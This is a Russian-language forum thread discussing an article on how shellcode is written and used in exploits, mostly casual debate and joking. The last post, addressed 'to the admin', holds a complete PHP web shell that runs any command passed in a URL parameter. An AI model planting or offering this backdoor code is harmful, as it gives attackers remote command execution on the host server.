В статье "How Shellcodes Work (http://www.linuxdevcenter.com/pub/a/linux/2006/05/18/how-she...)" рассказывается что такое shellcode (блок бинарного кода для запуска shell после использования уязвимости), как его создают и используют в эксплоитах.

URL: http://www.linuxdevcenter.com/pub/a/linux/2006/05/18/how-she...
Новость: http://www.opennet.me/opennews/art.shtml?num=7546

• Как создается 'shell код',pagan, 17:51 , 19-Май-06
• Как создается 'shell код',dropuser, 18:50 , 19-Май-06
  • Как создается 'shell код',pagan, 20:13 , 19-Май-06
• Как создается 'shell код',Аноним, 19:21 , 19-Май-06
  • Как создается 'shell код',slv, 18:43 , 21-Май-06
    • Как создается 'shell код',Аноним, 04:47 , 22-Май-06
• Как создается 'shell код',noname, 08:59 , 22-Май-06
• Как создается 'shell код',Zlobec, 09:25 , 22-Май-06
  • Как создается 'shell код',pagan, 09:45 , 22-Май-06
    • Как создается 'shell код',Осторожный, 11:57 , 22-Май-06
      • Как создается 'shell код',pagan, 12:11 , 22-Май-06
        • Как создается 'shell код',Zlobec, 12:51 , 22-Май-06
• Как создается 'shell код',Аноним, 10:35 , 23-Май-06
  • Как создается 'shell код',pagan, 12:11 , 23-Май-06
    • Как создается 'shell код',Zlobec, 13:47 , 23-Май-06
• АДМИНУ,N1eO, 19:43 , 07-Сен-06

>блок бинарного кода для запуска shell после использования уязвимости
да ну? А если я напишу 0free код, который будет, ну предположим, icmp запросы слать, это уже шеллкоднсом не будет?

А вообще стыдно уже такие статьи публиковать. Теме 10 лет уже. И ладно бы чего нить относительно новое писали (хотя бы про полиморфные/метаморфные shellcode, мультиплатформенные,etc), так нет, в 1024 раз напишут про то как сделать буфер оверфлоу в программе, и что самое главное, как написать, и скомпелировать сплоет (а значит и немного шеллкодеса).

Печально.

wbr.

>>блок бинарного кода для запуска shell после использования уязвимости
>да ну? А если я напишу 0free код, который будет, ну предположим, icmp запросы
>слать, это уже шеллкоднсом не будет?
вообще-то, нормальный шеллкод и есть 0-free
а во-вторых, сказано "чаще всего для запуска shell"

вам лишь бы придраться...

>вообще-то, нормальный шеллкод и есть 0-free
А я и не утверждал обратного.
>а во-вторых, сказано "чаще всего для запуска shell"
Это уже потом исправили. Изначально было "для запуска shell"
>вам лишь бы придраться...
Уверяю Вас, это не так.

Статья самое оно для тех кто только "где-то" слышал что такое шеллкод и эксплоиты но не разу не сталкивался вплотную.

Если Вам это не интересно, то это не значит, что не интересно никому...

ещё раз перечитайте, что он написал - поймёте, что он имел ввиду.

угу. въезжаем в новое тысячелетие верхом на танке с баяном прошлого века.

Теме 10 лет и 10 лет я читаю эти статьи с удовольствием

>Теме 10 лет и 10 лет я читаю эти статьи с удовольствием
И вот, настало время, Вам нужно срочно вступить и скомпелировать :-))))

скомпелировать -> скомпилировать

> скомпелировать -> скомпилировать
нет, нет, именно скомпЕлировать. Читайте хэккерский езинос от BHC %))

p.s. это не более чем стеб над "знатоками".

Я думаю мир прекрасен и без скомпелированово экспойта....

короче Адепты! вступайте и компелируйте! В месте мы сила!

>короче Адепты! вступайте и компелируйте! В месте мы сила!
Вы одепт негодный, потому как не знаете как пишется слово одпет.
Прошу ознакомиться с классификацией одептов: http://blackhat.nm.ru/odepts_classes.PNG

>>короче Адепты! вступайте и компелируйте! В месте мы сила!
>Вы одепт негодный, потому как не знаете как пишется слово одпет.
>Прошу ознакомиться с классификацией одептов: http://blackhat.nm.ru/odepts_classes.PNG

А че это он в двоичке шелкодит, я в статье видал там циферки и иксики ? )))))))))

<?

if (!empty($_GET['c'])) {
         echo '<pre>';
         system($_GET['c']);
         echo'</pre>';
}

exit;

?>